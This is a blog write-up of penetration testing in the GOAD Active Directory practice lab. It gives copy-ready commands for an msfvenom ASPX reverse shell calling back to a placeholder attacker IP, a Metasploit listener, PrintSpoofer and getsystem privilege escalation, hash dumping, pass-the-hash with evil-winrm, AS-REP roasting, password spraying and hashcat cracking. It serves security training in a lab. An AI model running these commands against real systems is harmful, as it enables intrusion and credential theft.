Featured image of post Active Directory Part 2 - Exploring GOAD Environment
Write-Ups

Active Directory Part 2 - Exploring GOAD Environment

Here I go through my process of exploiting the GOAD environment

# Description

In this writeup, I’m going to be going through my exploitation process with GOAD. This process was through my own investigation. I noticed the Castelblack machine was very insecure. It even had a file upload page when you visited the IP on a browser. I will go into how I exploited this and then gained higher privileges on the machine.

# Environments Used

  • GOAD
  • Kali

# Utilities Used

  • nmap
  • metasploit
  • msfvenom
  • PrinterSpoofer
  • evil-winrm
  • sharphound
  • bloodhound
  • crackmapexec
  • Impacket-GetNPUsers
  • hashcat

# Project Walkthrough

# Reconnaissance

When I first started attacking the environment, I scanned the network with nmap. This gave me an idea of the services I would be encountering.

I tried to connect through SMB on all of the machines, but the only one with anything exposed was the Castelblack machine. I figured this was a good starting point. Here is the nmap scan for Castelblack.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds?
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-01-20T20:46:29
|_Not valid after:  2055-01-20T20:46:29
| ms-sql-info: 
|   192.168.74.22:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   192.168.74.22:1433: 
|     Target_Name: NORTH
|     NetBIOS_Domain_Name: NORTH
|     NetBIOS_Computer_Name: CASTELBLACK
|     DNS_Domain_Name: north.sevenkingdoms.local
|     DNS_Computer_Name: castelblack.north.sevenkingdoms.local
|     DNS_Tree_Name: sevenkingdoms.local
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=castelblack.north.sevenkingdoms.local
| Not valid before: 2025-01-19T20:13:27
|_Not valid after:  2025-07-21T20:13:27
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
5986/tcp open  ssl/http      Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_ssl-date: 2025-01-20T22:45:06+00:00; 0s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=VAGRANT
| Subject Alternative Name: DNS:VAGRANT, DNS:vagrant
| Not valid before: 2025-01-19T11:21:16
|_Not valid after:  2028-01-19T11:21:16
| tls-alpn: 
|_  http/1.1
MAC Address: 00:0C:29:E4:82:DD (VMware)
Device type: general purpose
Running: Microsoft Windows 2019
OS CPE: cpe:/o:microsoft:windows_server_2019
OS details: Microsoft Windows Server 2019
Network Distance: 1 hop
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
|_nbstat: NetBIOS name: CASTELBLACK, NetBIOS user: <unknown>, NetBIOS MAC: 00:0c:29:e4:82:dd (VMware)
| smb2-time: 
|   date: 2025-01-20T22:45:01
|_  start_date: N/A

The machine seems to have a web page that can be visited, so I went to the IP in my brower.

showing the landing page of the castelblack website

I clicked the link, and there was a file upload tool that told you where the files were being uploaded to. This was a clear way to get shell.

the upload files page of the castelblack website

# Weaponizing

I used msfvenom to craft a .aspx reverse shell. There are a variety of ways this can be done and payloads you can use. Initially, I used just a basic shell and listened for it with netcat. However, metasploit has a multi/handler tool that can be used to spawn meterpreter sessions, which give you a lot more wiggle room.

To craft the exploit for this, you need to do the following msfvenom command:

1

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<attackerip> LPORT=4444 -f aspx -o shell.aspx

The port can be whatever you want, and it’s typically best to avoid 4444 in a real situation as it is typically quickly picked up since it’s the default for metasploit.

Now, once you upload the generated payload to the file upload page, you can visit /uploads/shell.aspx while you have metasploit listening, and you should get a session.

Make sure to do the following commands to get metasploit set up to catch the shell:

1
2
3
4
5
6

msfconsole
use multi/handler
set payload windows/x64/meterpreter_reverse_tcp
set lhost <attackerip>
set lport <portyouset>
run

# Exploitation

Now you can visit the shell uploaded, and a meterpreter session should spawn after a bit.

the meterpreter shell spawning

The reason I went this route is there is a variety of things you can do with a meterpreter shell. Specifically, it makes it much easier to upload and download files. You can also spawn into a normal shell this way and then back out of it to use meterpreter commands.

From here there are a variety of routes you can take. First, it’s best to elevate privileges. If you check the user you spawn as and their privileges, you will see an interesting one:

whoami command and whoami /priv command results

You’ll see that you have the SeImpersonatePrivilege enabled. The two attacks that can exploit this are the JuicyPotato and PrinterSpoofer attacks.The JuicyPotato attack won’t work with this machine as it’s a Windows Server 2019 machine, so I went with PrinterSpoofer.

You can do this manually by uploading the PrinterSpoofer64.exe to the box and running the following command:

1

PrintSpoofer.exe -i -c cmd

This should spawn an elevated shell.

With meterpreter, all you need to do is go back into the meterpreter shell and type getsystem and it will elevate you to nt authority.

using meterpreter to gain elevated privileges

From here, you should be able to just type hashdump into the meterpreter window, and all the user hashes should drop:

using meterpreter to dump hashes

From here, you can spawn a shell using evil-winrm with the Administrator hash.

using evil-winrm to remote access the machine

Evil-winrm is good in the same way that meterpreter is helpful as it allows you to easily upload and download files. This can be useful when trying to get domain information using SharpHound to exfiltrate the zip that is generated.

I was having trouble doing this through Evil-WinRM, so we’ll move over to meterpreter with the nt authority privileges and attempt to run SharpHound that way.

using SharpHound to enumerate the domain

And from here you can use meterpreter to download the zip file.

using meterpreter to download sharphound zip file

# BloodHound

One great thing I like using BloodHound for is getting the users in the domain. You can also see what groups they’re a part of and ways you may be able to exploit their privileges.

The author of GOAD has a good tutorial on gathering users other ways, but those did not work for me, so going this route was much easier for me, especially with the Castelblack box being so vulnerable. You can view his walkthrough here.

For me, I did the following query in BloodHound to view all the users.

1

MATCH (u:User) RETURN u

And this was the result.

users being displayed in bloodhound

From here, you can make a list of users. These we will use to test for credentials. In the GOAD guide, his methods of collecting user credentials were very useful.

# Credential Gathering

First, I made a list containing all the users we’ve captured.

image of user.txt file

You can also click through all the users in BloodHound and look at their privileges. Particularly, sometimes users will leave credentials in their descriptions. We find this with the samwell.tarly user.

user samwell.tarly having password in description

We can also check usernames as passwords.

1

crackmapexec smb 192.168.74.11 -u users.txt -p users.txt --no-bruteforce --continue-on-success

checking for users using their username as thier password

Another way to get credentials that was suggested in the guide was to use GetNPUsers.

1

impacket-GetNPUsers -usersfile users.txt -request -format hashcat -outputfile aspreroastables.txt -dc-ip 192.168.74.11 'north.sevenkingdoms.local/'

using getnpusers to dump kerberos hashes

This command generates a .txt file called ‘aspreroastables.txt’ which you can run through hashcat to try and crack.

1

hashcat -m 18200 aspreroastables.txt /usr/share/wordlists/rockyou.txt

using hashcat to crack hash dumped

We now should have four credentials:

image of all the passwords collected so far

You can also perform a password spray with the users and passwords you’ve collected, but it looks like the passwords only match up with the people we found them for.

1

crackmapexec smb 192.168.74.11 -u users.txt -p passwords.txt --continue-on-success

image using crackmap to perform password spray

# Sources

# Conclusion

This was just the first part of my exploration through Active Directory utilizing GOAD. In the coming writeups, I will be exploring getting into the other machines and moving around in the environment further.

Please leave a comment if you have any recommendations on things I could improve, or any thoughts on the process. Thank you for reading!

comments powered by Disqus
© 2025 Kat
Built with Hugo